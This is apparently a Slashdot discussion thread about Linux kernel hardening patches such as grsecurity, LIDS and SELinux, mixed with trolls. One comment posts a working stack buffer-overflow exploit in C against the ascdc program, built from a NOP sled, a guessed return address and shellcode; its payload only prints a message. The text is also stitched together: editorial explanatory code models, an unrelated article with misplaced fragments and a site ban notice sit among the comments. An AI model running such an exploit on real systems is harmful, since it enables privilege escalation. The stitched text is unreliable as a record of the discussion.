Additional Security in the Linux Kernel?
nyx asks: "Recently, I was looking for some way to improve security on my Linux boxes. I found a few Linux patches like grsecurity, LIDS (now also available as a Linux Security Module), and Medusa DS9.
I'm testing grsecurity (and its ACLs) now and I'm quite satisfied with it, but I wonder what the pros and cons of other solutions are. Has anybody tried them and can share his experience with us?"
Lock the door when you leave the computer room.
I love you, Stéphanie
DRM in the kernel would make the MPAA and RIAA happy, and maybe THEN Billy will release Microsoft Linux!! =)
US$0.02++
I've been using the grsecurity patch on the medium level. Seems to help out a bit, haven't had any problems. Performance does not seem to be affected.
You roxorz my soxorz! I love you, commander Taco!
-Cowboy Neal
If you need absolutely secure Linux, use OpenBSD or Trusted BSD with the Linux-compatibility library.
Let's hear it for NSA Security Enhanced Linux! Whoo!
If the NSA security enhanced your machine, would you even know about it? Suspect it?
[o]_O
Fourth Post!!
third post! for palestine!
You'll need it, with this CmdrTaco fuck up:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Payload: write(1, msg, 0x50) followed by exit(0); all it does is print
 * the two WarGames lines below. 32-bit x86 Linux only. */
char shellcode[]=
"\xeb\x15\x59\x31\xc0\x31\xdb\x31\xd2\xb0"
"\x04\xb3\x01\xb2\x50\xcd\x80\x31\xc0\xb0"
"\x01\xcd\x80\xe8\xe6\xff\xff\xff"
"Would you like to play a game? y\x0aStrange, the only winning move is not to play.\x0a";
#define bsize 600
/* Current stack pointer, handed back through %eax (32-bit x86 only). */
unsigned long get_sp(void) {
    __asm__("movl %esp,%eax");
}
int main(int argc, char *argv[]) {
    char *buff, *ptr;
    long *addr_ptr, addr;
    int i;
    buff = malloc(bsize);
    addr = get_sp();
    /* fill the whole buffer with the guessed stack address */
    ptr = buff;
    addr_ptr = (long *) ptr;
    for (i = 0; i < bsize; i+=4)
        *(addr_ptr++) = addr;
    /* NOP sled over the first half, with the shellcode centred in it */
    for (i = 0; i < bsize/2; i++)
        buff[i] = 0x90;
    ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
    for (i = 0; i < strlen(shellcode); i++)
        *(ptr++) = shellcode[i];
    buff[bsize - 1] = '\0';
    execlp("/usr/X11R6/bin/ascdc","ascdc","-d",buff,(char *)0);
    return 0;
}
For the last time, please. The word "it's" is a contraction of "it is." It is not the possessive form of the pronoun "it." "Its" is the possessive form of the pronoun "it." Please get this clear. Jackasses.
http://www.solucorp.qc.ca
You can create virtual servers on your machine, tailored for specific tasks.
For example, you can create a virtual server where you'll work on your project, a virtual server which will run Apache, and a virtual server in which you'll browse the web and read mail.
You can then put them on different IP addresses (or no addresses at all) and make them independent, exchanging information only by means YOU approve (shared directory, TCP sockets under a firewall, etc.).
It's a kernel patch and some user-mode programs.
Virtual servers can share binaries to save disk space.
http://www.nsa.gov/selinux/
adds some interesting security features, but doesn't support X, so I didn't install it on my work computer.
Also adds the question: do we trust the NSA even if the source is available?
Buy a Mac. ;-)
I'm currently using OpenBSD in a work-related project. It's quite good, if not well documented.
You can't ride two horses with one ass
I seem to remember kernel patches happening in Bastille Linux... but then again, in these autumnal years... I remember things that never happened more and more...
The Linux Security Model has been included in the upcoming 2.6.
I was thinking about Microsoft's current activities with .NET set-tops, Xboxes, Palladium and so forth, and it occurred to me.
Microsoft sees a transition from stand-alone PCs to portable and set-top computers designed as multifunction multimedia/communication stations. Its plan is to be the only option as far as the MPAA and RIAA are concerned, the only software/hardware with full DRM security. I say Linux should embrace DRM because if they don't, even computer geeks like me won't buy machines running Linux that won't play broadcast digital content (cable, internet, etc.) because it won't authorize.
Sorry, random thoughts.
How about adding an IQ test to the standard login for anyone connecting to your server? Users are stupid. You should prevent the really stupid ones from getting you into trouble. In fact, if they score low enough on the IQ test - you should give them a broken television. When they ask for the keyboard, tell them it is on the "backend" (behind the "firewall") - making sure to make the quotes in the air with your fingers. I've noticed a disturbing trend lately that laypersons love the terms firewall and backend - without any understanding of said terms. It's a bit disturbing.
Has anybody tried them and can share his experience with us?
:)
I have a lot to contribute to this, but since I'm a hot chick, I guess nobody's interested!
Linux Security Modules is what adds hooks into the kernel for security. LIDS uses the LSM hooks, and so does SELinux, and (I think?) others. But LIDS != LSM.
You might want to check out Saint Jude - a kernel intrusion detection and response system which detects and blocks 'anomalous' behavior (such as root exploits). The developer first presented it at Defcon 8 and it looked pretty cool. It's been in development for over a year - see its SourceForge page for more.
While we are on the topic of security, I was wondering whether there are any products similar to StackGuard (www.immunix.org) available for a newer gcc? StackGuard is commercial and only works with older versions of gcc. If there were such a thing, one could probably do a whole-system recompile with it (à la Gentoo). That would beef up the security considerably. The Immunix FormatGuard also looks interesting.
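The protection StackGuard adds is a canary word placed between a function's local buffers and its saved return address, checked in the epilogue before the function returns. The following is an added C example that models that check; it is not Immunix code and not code from this thread. The `struct frame` layout, the `CANARY` value, the `guarded_copy` helper and the sample inputs are all constructed for illustration (a real compiler emits the check on the actual stack frame; current GCC ships the same idea as `-fstack-protector`).

```c
#include <stdio.h>
#include <stdint.h>
#include <string.h>

/* Model of a stack frame: a fixed buffer, then the canary word that
 * StackGuard places between the locals and the saved return address.
 * Constructed example: real frames live on the stack and the real check
 * is emitted by the compiler in the function epilogue. */
#define BUF_SIZE 16
#define CANARY 0x000aff0dUL   /* "terminator" canary: NUL, LF, EOF, CR */

struct frame {
    char buf[BUF_SIZE];
    unsigned long canary;
    unsigned long saved_return;   /* the word an overflow is really after */
};

/* The bug StackGuard exists for: a copy bounded by the input, not the buffer.
 * Writing through a char pointer to the whole struct keeps the demo inside
 * one object (so it stays well defined) while still letting long input run
 * over the canary and into the saved return address. */
static void unbounded_copy(struct frame *f, const char *src, size_t len)
{
    if (len > sizeof *f)
        len = sizeof *f;
    memcpy((char *)f, src, len);
}

/* The epilogue check: 1 if the canary is intact, 0 if it was overwritten. */
int canary_intact(const struct frame *f)
{
    return f->canary == CANARY;
}

/* Feed one input through the model. Returns 1 when the function would have
 * been allowed to return normally, 0 when the canary check would abort. */
int guarded_copy(const char *input, size_t len)
{
    struct frame f;
    memset(&f, 0, sizeof f);
    f.canary = CANARY;
    f.saved_return = 0x08048000UL;   /* constructed "legitimate" return address */
    unbounded_copy(&f, input, len);
    if (!canary_intact(&f)) {
        fprintf(stderr,
                "stack smashing detected: canary is now 0x%lx, return address 0x%lx\n",
                f.canary, f.saved_return);
        return 0;
    }
    return 1;
}

int main(void)
{
    char oversized[64];
    memset(oversized, 'A', sizeof oversized);   /* constructed over-long input */
    printf("short input : %s\n", guarded_copy("hello", 5) ? "returns normally" : "aborted");
    printf("exact fit   : %s\n", guarded_copy("0123456789abcdef", 16) ? "returns normally" : "aborted");
    printf("64 x 'A'    : %s\n", guarded_copy(oversized, sizeof oversized) ? "returns normally" : "aborted");
    return 0;
}
```

The point the model makes is that the canary does not prevent the overwrite; it turns a silent control-flow hijack into a detected fault before the corrupted return address is ever used, which is why a whole-system rebuild with such a compiler changes the failure mode of every stack overflow at once.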
D.
Securing Linux is like making a reliable kit-car. It's made of lots of different parts put together to make a whole. Unfortunately, every whole has holes.
Let's put the argument into two forms: the basic, and the advanced. The basic argument is that Linus created Linux to be insecure so that he could recruit hundreds of programmers to take up the cause. If he had written a perfect OS first time round, would it have got lots of people coding on it? No. It is also interesting to note that Linux is written in C, a language that provides no security features such as garbage collection and object orientation (used to keep things in one context, so that code cannot attack other objects), whereas if the kernel were written in x86, these problems would not exist.
The advanced spin is that Linux suffers from 'feature gaps', a problem that doesn't exist in Windows 2000/XP thanks to Microsoft's superior code. It is a very sad fact, but logically Microsoft's programmers are smarter than those in open source, simply because they're able to earn more money. These feature gaps provide the perfect holes for DoS attacks and other such security nasties.
If you really want security, go for an operating system controlled by one company, who knows what their code does, and how to fix it if it goes wrong. The only option, in that case, is Microsoft.
mogorific carpentry experiments
I had a friend who ran all of his INET services through a VMWARE instance on his Linux box. He would get hit by a script kiddie, and then use the ROLLBACK feature to undo the damage. He would patch the hole on the virtual machine and start up the site as if nothing happened.
Brilliant! No one can hack a computer that's locked up or out for repairs!
The Linux kernel is the model of security. Haven't you read The Cathedral and the Bazaar? Many millions of eyes have pored over every aspect of the kernel to ensure an optimal and safe computing experience for you.
If anybody needs proof that the trolls have WAY too much time on their hands, this is it.
It's one thing to post something funny, contrarian, or even subversive, but this is just stupid junior high school giggly stuff.
If you're going to be a troll, at least post something clever. Got news for you: you're not shocking anyone by this. It just makes you look like a pathetic loser teenager.
Nice troll... Don't feed the troll...
"kernel were written in x86" ??
Is x86 a language? You mean if the kernel were pure assembly it would not have the problems it does because it's written in C?
You know C was designed more or less as a "portable assembly language" for the PDPs. That is WHY it has the buffer-overflow type problems it does.
Morphing Software
Critical systems shouldn't be on the net! If there is something that you need to ensure remains safe, don't put it on a machine with an internet connection. The Linux kernel is as secure as it gets; most of the patches you list are useful mostly against local exploits, not remote. Linux has relatively few remote problems; most bugs relate to local exploits. Lock your door! Run a firewall (Linux makes this sooo easy!) and encrypt, encrypt, encrypt! Anything under 512 bits isn't secure and I use 1024 just to be safe. Make sure you manage file permissions properly and change your password from time to time. That's all I can say.
There is also SELinux. Mandatory Access Control is also a better security model than Discretionary Access Control, which is the current model of most network OSes "out of the box". With MAC you have policies that control access to services, files, anything, and if "something" tries to access a service it must be part of the policy that tells it what it is allowed to do; if it tries something outside the policy, it fails: kind of like a firewall's deny-by-policy.
here is a link to some more info about it:
http://www.nsa.gov/selinux/docs.html
Nex6
Bastille Linux is user space hardening (e.g. changing file permissions, disabling telnet and other vulnerable services, setting up IPTables and various other security features), no kernel patches as far as I remember.
"Karma can only be portioned out by the cosmos." -Homer Simpson
nice troll
garbage collections, feature gaps? wtf are you talking about
It's obvious that the only answer to this question is for all kernel developers to stop all productive activities for one month in order to sit through long and boring security lectures in groups of 500. After this month linux will be fully compliant with the "trusted security initiative" and will be magically bug free. Until such time as another bug is discovered.
They who would give up an essential liberty for temporary security, deserve neither liberty nor security
This is pointless. Linux has demonstrated time and again its unparalleled leadership in security. As an IT consultant, I've seen every flavor of server there is, from OS/2 to MacOS X. In 90% of cases, clients are willing to reduce their servers' feature set, flexibility, and ease of maintenance by switching from Win2k to Linux, solely due to the improvements in security. Microsoft does many things well, but security is not one of them. Go Linux!
Karma: Good (despite my invention of the Karma: sig)
There's a program called Snort that does packet sniffing and intrusion detection, among other things. It's at snort.org.
That and good ol' P.G.P.
We're Doomed
A Linux user goes back.
/etc/fstab file so that it always automounted when plugged in. I was very impressed.
/dev/null, once I find where that actually is.
By Tony "kNIGits" Collins.
Introduction...
In much of today's online news, we hear of how many people are migrating to GNU/Linux. What we don't seem to hear much of, is users going back to their old operating systems. The reason for this article is to say that I've done just that.
Yes, I've gone back. After three and a half years of trying to make GNU/Linux work on the desktop, I've decided that it's simply too hard for the average home user. Before I go into my reasons for going back, let me outline what I believe an 'average' home user is. Mr Joe Average is someone who wants to install their OS, boot it up, and it works. He wants to be able to upgrade his PC , and have the hardware work in a few short minutes. He wants to read email, browse the web, talk to his mates online, and play some games. Feel free to disagree with me, this is merely how I see myself. Note: I'm not referring to Grandma using Linux, or even my mum using it. I'm referring to average users who know a little about their computer.
Three and a half years; that's how long I've been trying to make Linux work on my desktop computer. Right about now, I'm sure that you are now screaming that I didn't try hard enough, or that I'm just plain stupid. Let me assure you that this is not the case. Stupid users don't doggedly stick at something for three and a half years, trying distribution after distribution in the hope of finding the holy grail of Linux desktops. They give up in less than a few hours of trying to (unsuccessfully) install RedHat Linux. Hear now my sad tale of why Linux isn't suitable for my desktop.
Some background...
The year is 1998. I've had my Windows '95 computer for around six months. Frustrated with the constant crashes, I desperately asked an online mate for help. Even though he was a windows user, he calmly suggested that I try something I'd never come across before...
"Linux, eh? Never heard of it."
"Oh, it's a free OS that you can download. Apparently it doesn't crash much. Just do an online search for it."
Armed with this meagre knowledge, I set out on my quest for the ultimate stable operating system. I searched online, and found places where you could even buy copies of Linux! So, I left the comfort of my warm study, and returned forty minutes later with my first Linux boxed set: RedHat Linux 5.2. After initially balking at the very basic installer (and few false starts), I had it up and running on my lovely AMD K6-233. I even got X working in no time at all. Then the system booted up for the first time.... and it was dead ugly. I had a very stable new OS, but I didn't even want to look at it. I was happy that I had several installed interfaces to choose from, but none of them appealed to me whatsoever. Wanting to download a nicer interface led me to my next problem.
I had absolutely no idea how to even get this nice, stable OS onto the internet! After reinstalling windows and RedHat in a dual-boot configuration, I got the help I needed by using Windows and USENET. Strangely enough, I can still remember the name of the long-suffering person who helped me get RedHat online, but that's another story. After looking around online, I discovered KDE. Only up to version one, it was the closest thing I had to a completely useable Linux system. I downloaded all the KDE packages for RedHat 5.2, only to discover another distro called Mandrake, that came with KDE preinstalled and configured. Back to my local distributor, and I was set.
Mandrake with KDE was exactly what I needed at that stage in my Linux using life, and I stuck with it for over a year and a half. Always seeking the 'perfect' desktop OS, I followed releases from version 5.3 all the way through to 7.0. Eventually I became dissatisfied with Mandrake, and briefly tried a number of other distros until I finally settled on Debian. I was impressed by the simple power, configurability, and the ease of upgrade that is apt-get. I felt good about being among the uber-elite Debian user community. Needless to say, I learned a lot about how to configure hardware under Linux during my time with Debian. I learned to sift through the old HOWTOs on Linux Doc until I found something suitable and accurate, I learned to utilize the power of USENET and IRC. Life was good.
Right now you must be wondering: "Where is this leading? This guy seemed quite happy with Linux!" True, I was. After a while, I decided I didn't want to have fine-grained control. I wanted something simple. I was getting tired of the 'stable' Debian release being so out of date, and the 'unstable' distribution being so... well... unstable. I got tired of having to recompile my kernel every time I got new hardware. I got tired of using command line to talk to my PC. It was time for a change. I had good experiences years ago with Mandrake, so I figured I'd try it again. As good as Mandrake 8.1 was, it wasn't what I was after. SuSE Linux 8.0 Professional (boxed set) was installed onto my PC instead.
I have to stop at this point, and say that SuSE Linux 8.0 (Pro) is the best Linux distribution that I've ever used. It has an easy installer, reasonable hardware support, and comes with the very good KDE 3.0. The box contains seven CDROMS, one DVD and three decent books that would help even the most inexperienced user get up and going. YaST2 is a decent graphical system configuration tool. When (not if) I go back to Linux, I'll definitely try SuSE again. However, there are quite a number of things that have to improve (or change completely) before I'll consider going back. Read on for my brief list of things that must get better before I'll switch back from the Microsoft camp.
Where GNU/Linux needs to improve...
X11
The X Window System is an awesomely powerful, network transparent graphical subsystem. It's perfectly suited to running applications from remote servers. However, this is NOT what a home user needs. My experience with X is that it's too big, bloated, slow and unstable to be any good to the home user. Most crashes that I ever experienced with Linux have been X's fault. My servers don't run X, and they never crash.
What home users need is something small and fast, so they can run local applications efficiently. I would like to see the X Window System dumped in favour of a hardware accelerated framebuffer, running something like directFB or Qtopia. Home users need a small, fast graphical subsystem, with built in 3d support. BeOS seemed to be on the right track before they went under.
Fonts are truly awful under X. Most distributions ship with appalling fonts, and there is no standard way to add additional (nicer) fonts to the system. Even after extra fonts have eventually been added, many applications (eg Abiword, Staroffice) refuse to use the new fonts anyway. Perhaps the framebuffer-based graphical subsystem I suggested could incorporate decent font support, and use a readable naming scheme as well.
Drivers
While having access to the latest version of the kernel is a good thing for developers, for home users it can be a nightmare. Got RedHat Linux 7.3? Perhaps you run SuSE 7.3 or Debian 2.2. You'll have to download a binary package specific to your distro. (I'm assuming that home users won't change their default kernel, but if they did, that binary package wouldn't even work!) Hardware manufacturers should be able to provide one single driver that works on all minor versions of a major kernel release. This way it would work with all current distros, instead of having to provide multiple binaries or source code. Hardware manufacturers don't want to give out the source, as this often gives away trade secrets about how their hardware is designed.
The solution seems to be to make binary drivers work on a variety of kernel versions. I'm not sure if this is even possible with the way the kernel is designed (I'm no kernel hacker), but it would go a long way toward making Linux more accessible to the home user. Even if the kernel needs to be redesigned to support this, then in my opinion, it should be done. Linux users are always clamouring for drivers... perhaps if the kernel had something like this, it might one day become a reality.
Hardware setup
While SuSE Linux 8.0 gave me some good experiences with hardware detection (such as automatic download of NVIDIA drivers), it also let me down in this area.
The good: I recently borrowed a digital camera from a mate at work, to take photos of my case mod. Imagine how happy I was when I plugged it into my nearest USB port, and it was automatically configured (as a SCSI device) and mounted! SuSE even added it to my
The bad: Along came my new IDE CDRW drive. At AU$99, I couldn't pass up the purchase. Plugging it in gave me no joy. I was very disappointed that a device so common couldn't be detected and automatically configured under a modern operating system. The instructions on the SuSE support site said to add lines to lilo.conf and reboot. While this is a perfectly acceptable way to get hardware working for a geek familiar with *NIX, I believe that a home user shouldn't have to do more than plug it in. It's an IDE device, it's not that complicated!
The ugly: Once the hardware was finally working (as a pseudo-scsi drive), the next hurdle was to find decent graphical tools to burn and copy CDs. I finally settled on CDBakeOven, an above average KDE application. It burned CDs from data on the hard drive, but for some reason cdrecord (the command line backend) refused to allow me to copy a cd directly. Yes, it was installed SUID root. CD copying is such a basic function nowadays, why is it so hard to do under GNU/Linux?
Software distribution
I'll put this simply. I'm a home user, not a programmer. Why on earth should I have to compile the software I want to use? I know that having the source available is a good thing, but I'll say it again: I'm no programmer. I just want to install software and run it.
This leads to another point. Although having package databases (such as the rpm and deb systems use) is great, there should definitely be separation between system packages and additionally installed software. There needs to be a standard installer and database for user-installed applications such as word processors, email clients and games, and it should be separate from the rpm or deb databases used for system software such as lilo, init and cron. This will make it much easier for home users to know what applications they have installed on their PC, and to easily uninstall them if necessary, without knowing some arcane commands and weird package names.
Support
There is a huge wealth of knowledge among the thousands (millions?) of people that run GNU/Linux around the world. If you have a problem, odds are that someone out there can help you, often for free. This is one of the linux platform's greatest strengths. However, Linux users are also its greatest weakness. This may not apply to most of the community, but there is a very vocal minority that gives Linux a bad name. To every Linux user that has ever helped a newbie, I thank you. I have been helped by many a guru, often when I've been asking the simplest of questions. It's the remainder that are a problem.
I once heard a song by Three Dead Trolls in a Baggie called Every OS Sucks, where Linux users were described as 'elitist nerdy shmucks'. Sadly this is true for much of the 'community'. Too many consider themselves better than the rest of the world because they run Linux. Can you believe that? It's just a computer operating system, but somehow they think that it makes them better than those people who run systems such as Microsoft Windows! Elitism drives people away, as does saying "RTFM" or belittling people who choose a different distro from yourself.
'Nuff said about that.
So what now?
Well, I decided to go back to a Microsoft platform. Initially being paranoid after reading things about DRM and spyware, I bit the bullet and installed Microsoft Windows XP. Like every OS, it has good and bad points; most of which you can learn about from online reviewers. I'll just point out several things that make me want to keep using it instead of GNU/Linux.
Fast graphical subsystem: Windows has lightning quick graphics, both 2d and 3d. There's no denying it. When I move a window, it refreshes so fast that I don't miss X11 at all. While not quite as nice as some other operating systems, font support is outstanding compared to XFree86.
Drivers: Point and click to install (as a superuser, of course). Windows warns you if the driver isn't likely to work properly, and can roll back to working drivers if you deliberately choose to install one that hoses your system.
Hardware setup: My CDRW worked right away, without a hitch. I am able to drag and drop files from the Explorer file manager to the CDRW icon and they get added to the list of things to burn. A quick install of Nero Burning Rom, and I was able to make a backup copy of my game CDs. (I don't like taking originals to LANs where they can get destroyed or stolen).
Software distribution: All windows software comes in binaries, either with an installer or in a zip file. I hope to never compile an application ever again. Software designed for a different version of windows is 99% guaranteed to run, but if not, there is always 'compatibility mode'. One thing to note, however: Applications designed for single user versions of windows usually only run properly as a superuser, and this includes 3d games. I expect this to be rectified as the rest of the Windows world catches up to a multi-user environment.
I can't comment on the Windows using community yet. I've not yet had a problem that a simple point and click couldn't fix. However, I will say that my original concern with Windows '95 has been addressed in Windows XP. The stability is finally there.
Final Notes
In conclusion, I'd just like to make it known that I haven't completely abandoned the Linux community. My home server still runs Mandrake, and IPCop on my gateway/firewall. There is no way I'd ever put any form of Windows on my server, nor would I ever connect a Windows PC directly to the internet without a *NIX gateway in between. Microsoft has a history of poor security, so I protect myself the only way I know how; using Linux. I will continue to advocate the use of GNU/Linux in the server arena. This is where its strength lies at the moment.
Because of their history of spreading virii, I don't use the applications that Microsoft has provided with Windows XP. My wife and I use Mozilla for web browsing and email, OpenOffice.org for word processing, and Psi (Jabber client) for instant messaging. All of these are true multi-user win32 programs, and are perfectly interoperable with their Linux counterparts.
I expect that the Linux community will have something to say about this article; I welcome comments and constructive criticism. Flames will be automatically sent to the Windows equivalent of
By Tony "kNIGits" Collins
- posted by poopbot: information likes to be narrow
jLw2w4QNd6 Post #763
Feature gaps like a fox!
ACLs (access control lists) are a wonderful technology, but for non-trivial systems they become an administrative pain in the @ss. In principle you would set them up and forget about them, or at least let users maintain their own, but in practice users can't maintain their own, and they will pester you to death with requests for changes.
They also tend to drag the sysadmin into office politics. E.g., Secretary A is out on vacation and Secretary B calls you and says Secretary A did not set up her ACLs correctly and would you please give B access to certain of A's files. In addition to the annoyance of having to babysit the users, there's really no correct response to such a request.
ACLs would be great on a system where everyone is a power user. In practice that usually means your home system where you are the only user, so ACLs aren't very helpful anyway.
Conclusion: wonderful technology, hope I never see it again.
BTW, I speak from personal experience, having formerly managed VAXen with their wonderful ACL implementation. I don't object to ACLs on Linux, I just don't want them.
Sheesh, evil *and* a jerk. -- Jade
You probably wanted to be flamed, at least I hope to God for your sake you did this to intentionally draw flames, but I'm not going to flame.
Instead, I'm just going to state clearly and concisely: Look at the huge amounts of problems the security holes in Winblows has caused, and look at the problems the security holes in Linux has caused.
The proof is in the pudding, the actual track record of each OS, everything else is hypothetical bullshit.
Either your network or ip address has been banned from this site
due to script flooding that originated from your network or ip address -- or this IP might have been used to post comments designed to break web browser rendering. If you feel that this is unwarranted, feel free to include your IP address (1.2.3.4) in the subject of an email, and we will examine why there is a ban. If you fail to include the IP address (again, in the Subject!), then your message will be deleted and ignored. I mean come on, we're good, we're not psychic.
Since you can't read the FAQ because you're banned, here's the relevant portion:
Why is my IP banned?
 Perhaps you are running some sort of program that loaded thousands of Slashdot Pages. We have limited resources here and are fairly protective of them. We need to make sure that everyone shares. If your IP loads thousands of pages in a day, you will likely be banned. Please note that many proxy servers load large quantities of pages, but we can usually distinguish between proxy servers being used by humans, and IPs running software that is hammering our servers.
 Your IP might have been used to perform some sort of denial of service attack against Slashdot. These range from simple programs that just load a lot of pages, to programs that attempt to coordinate an avalanche of posts in the forums (often through misconfigured "Open Relay" proxy servers).
 You might be using a proxy server that is also being used by another person who did something from the above list. You should have your proxy server administrator contact us.
 Your IP might have been used to post comments designed to break web browser rendering.
Answered by: CmdrTaco
Last Modified: 7/02/02
How do I get an IP Unbanned?
Email banned@slashdot.org. Make sure to include the IP in question, and any other pertinent information. If you are connecting through a proxy server, you might need to have your proxy server's admin contact us instead of you.
Answered by: CmdrTaco
Last Modified: 3/26/02
- posted by poopbot: lovely snot! wonderful snot!
rLV4eIWI1u Post #764
- Do not connect the Linux box to the Internet.
- Remove your floppy drive.
- Remove the power switch.
- Lock the computer away in a safe.
Of course this has the disadvantage that you cannot use your computer anymore. But that's the price you have to pay for security...This way you'll be safe from DoS attacks, as well as other attacks from the net.
Before the days of the net, floppies were the main way to spread viruses.
All measures above only protect from the danger of remote people. But by removing the power button (and therefore the possibility to turn the computer on), even people who get physically to the computer can't do anything evil with it.
All of the above measures could be circumvented with a simple screwdriver and other normal equipment. But by putting it into a good safe, you're safe from the average intruder.
The Tao of math: The numbers you can count are not the real numbers.
This is such an obvious troll. What a shame it got modded up. Just a few of the more glaring errors:
C, a language that provides no security features such as garbage collection
In what sense is garbage collection a security feature? That makes no sense.
It is a very sad fact, but logically Microsoft's programmers are smarter than those in open source, simply because they're able to earn more money
That's not true at all. As someone who makes their living programming I can tell you that there are plenty of dumb commercial programmers and plenty of smart open source programmers. And vice versa. If you really wanted to be "logical" you'll understand that money earnt is not the same as skill. Plenty of people do highly skilled work without payment - ever heard of a hobby?
go for an operating system controlled by one company, who knows what their code does, and how to fix it if it goes wrong. The only option, in that case, is Microsoft.
Er... or Apple?
Like I said, blatant troll.
Sailing over the event horizon
"...It is a very sad fact, but logically Microsoft's programmers are smarter than those in open source, simply because they're able to earn more money..." Did you know that a McDonalds manager makes $26 an hour and a starting computer tech makes about $8. Who is smarter? The guy wearing the paper hat or the geek..... I'll just let you think about that one.
This is how you know you're a geek the power goes out and you are unemployed and unemployable. Yes I know I can't spell
Microsoft has taken all the hard work out with Windows 2000! There is a cool GUI you can use to point-and-click your way to a safe and secure system. Now I don't have to keep up with recompiling the kernel, all I have to do is apply the occasional service pack.
People often forget that the things that make unix multiuser are great security tools. For example, for local security, people who should be able to run certain suid programs can be put in special groups, and then the admin can chown and chmod the executables appropriately.
Running applications in a chroot'ed environment is also helpful. A bit hard to setup, but once you do it, no problems.
Use tools such as iptables to restrict access. For instance, if you know that all your connections will come from *.host.com, change the rules accordingly.
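The comment above and the earlier SELinux comment in this thread describe the two layers that decide an access on a hardened Linux box: the ordinary discretionary model (owner, group and other mode bits, suid binaries restricted to a special group via chown and chmod, root bypassing the bits) and the mandatory model (an allow-list policy keyed on the process's domain and the object's type, default deny, no exemption for root). The following Python is an added example, not code from any poster, from SELinux or from grsecurity; the users, groups, paths, labels and policy rules are all constructed for illustration. It shows the case that matters most: a process running as root whose domain has no rule for the object is refused even though DAC would let it through.

```python
"""Toy model of two access-control layers on a Unix host.

DAC: the ordinary owner/group/other mode bits, with uid 0 bypassing them.
MAC: a type-enforcement policy in the style of SELinux, keyed on the
process's domain and the object's type; anything not explicitly allowed
is denied, and uid 0 gets no exemption.

Added example: every user, group, path, label and rule below is
constructed for illustration and is not taken from any real policy.
"""
from dataclasses import dataclass

R, W, X = 4, 2, 1  # permission bits, as in chmod


@dataclass(frozen=True)
class Subject:
    name: str
    uid: int
    groups: frozenset  # supplementary groups (DAC)
    domain: str        # process label (MAC), e.g. "httpd_t"


@dataclass(frozen=True)
class Obj:
    path: str
    owner: str
    group: str
    mode: int   # e.g. 0o4750: suid root, owner rwx, group r-x, other ---
    label: str  # object type (MAC), e.g. "shadow_t"


# MAC policy: (subject domain, object type) -> permitted bits.
# Any pair that is absent is denied; this is the "deny by policy" default.
POLICY = {
    ("backup_t", "backup_exec_t"): R | X,
    ("backup_t", "shadow_t"): R,
    ("user_t", "backup_exec_t"): R | X,
    ("httpd_t", "httpd_content_t"): R,
}


def dac_allows(s: Subject, o: Obj, want: int) -> bool:
    """Discretionary check.  Root bypasses the read/write bits (it still
    needs at least one execute bit to exec a file).  Otherwise exactly
    one triplet applies, chosen in the order owner, group, other."""
    if s.uid == 0:
        return not (want & X) or bool(o.mode & 0o111)
    if s.name == o.owner:
        bits = (o.mode >> 6) & 7
    elif o.group in s.groups:
        bits = (o.mode >> 3) & 7
    else:
        bits = o.mode & 7
    return bits & want == want


def mac_allows(s: Subject, o: Obj, want: int) -> bool:
    """Mandatory check: an explicit allow rule must cover every requested
    bit.  The uid plays no part; only the labels do."""
    return POLICY.get((s.domain, o.label), 0) & want == want


def decide(s: Subject, o: Obj, want: int) -> dict:
    """Both layers must agree; the kernel consults DAC first, then MAC."""
    dac, mac = dac_allows(s, o, want), mac_allows(s, o, want)
    return {"dac": dac, "mac": mac, "granted": dac and mac}


# --- constructed sample data (hypothetical users, groups and files) ---
BACKUP_TOOL = Obj("/usr/local/sbin/backup_tool", "root", "backup", 0o4750, "backup_exec_t")
SHADOW = Obj("/etc/shadow", "root", "root", 0o640, "shadow_t")
WWW_INDEX = Obj("/var/www/index.html", "www", "www", 0o644, "httpd_content_t")

BOB = Subject("bob", 1001, frozenset({"backup"}), "backup_t")   # member of the backup group
ALICE = Subject("alice", 1000, frozenset({"wheel"}), "user_t")  # not a member
HTTPD_ROOT = Subject("root", 0, frozenset(), "httpd_t")         # web server running as uid 0


def report():
    """Return one summary line per scenario."""
    cases = [
        ("bob executes backup_tool", BOB, BACKUP_TOOL, X),
        ("alice executes backup_tool", ALICE, BACKUP_TOOL, X),
        ("root httpd reads /etc/shadow", HTTPD_ROOT, SHADOW, R),
        ("root httpd reads index.html", HTTPD_ROOT, WWW_INDEX, R),
    ]
    lines = []
    for title, s, o, want in cases:
        d = decide(s, o, want)
        lines.append(f"{title:32} DAC={'ok ' if d['dac'] else 'DENY'} "
                     f"MAC={'ok ' if d['mac'] else 'DENY'} -> "
                     f"{'granted' if d['granted'] else 'denied'}")
    return lines


if __name__ == "__main__":
    print("\n".join(report()))
```

Running the block prints the four decisions. The second case is the group trick from the comment above: alice is refused by the mode bits alone, before any policy is consulted. The third is the SELinux point: the web server's root privilege is irrelevant because httpd_t has no rule for shadow_t. The model deliberately leaves out ACL entries, the suid domain transition itself and capabilities, and a real policy checks far more than three bits per object class; what it preserves is the decision structure, not the policy language.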
Kernel patches are ugly. They try to get at the root of the problem, but they miss it completely.
The point is that vulnerable code is written by bad coders, who for some unknown reasons think that C is the best language in the universe. Clearly, they can't handle the power that C gives them and should use languages that provide memory handling for them.
... you can try PitBull from Argus Systems. It's a very good product and free for non-commercial use (I think). If you can live without the source to their module.
Credits: dmg
Yet again the Linux so-called elite, backed up by their pseudo intellectual cohorts of the w3c conspire to ruin Linux's chances in the marketplace by sowing confusion and complexity. As someone with years of experience in the marketing world, I am constantly amazed at the willingness of the W3C and other bodies to pollute the acronym space with their content free "TLAs".
Basic marketing 101 (and an undergrad course in psychology) would tell them that the normal person is only capable of remembering approximately 7 items of data in their short-term memory, but now we have to remember HTTP, HTML, XML, XSL, DTD, PHP, SSL, DSL, ADSL, ISDN, Perl, etc etc etc
This is a text book example of the tail wagging the dog from a marketing perspective.
I have been following the standardisation of the web for many many months now, but one thing has become clear, E-commerce will NEVER become popular so long as there are so many confusing acronyms involved. The guys in charge of marketing Linux absolutely MUST work to reduce the number of acronyms. One possible solution would be to merge those protocols which are not all that different. For example, why not merge XML with SGML ? (they could call it XSGML or SXGML or perhaps XMSGML), they seem to address the same problems. Or would that be too simplistic a solution for their pampered elitist ivy-league minds to comprehend ?
If something is not done URGENTLY, and I mean URGENTLY, Linux (and other more experimental derivatives such as FreeBSD) can never hope to be taken seriously as an e-commerce platform by the people who count - the accountants.
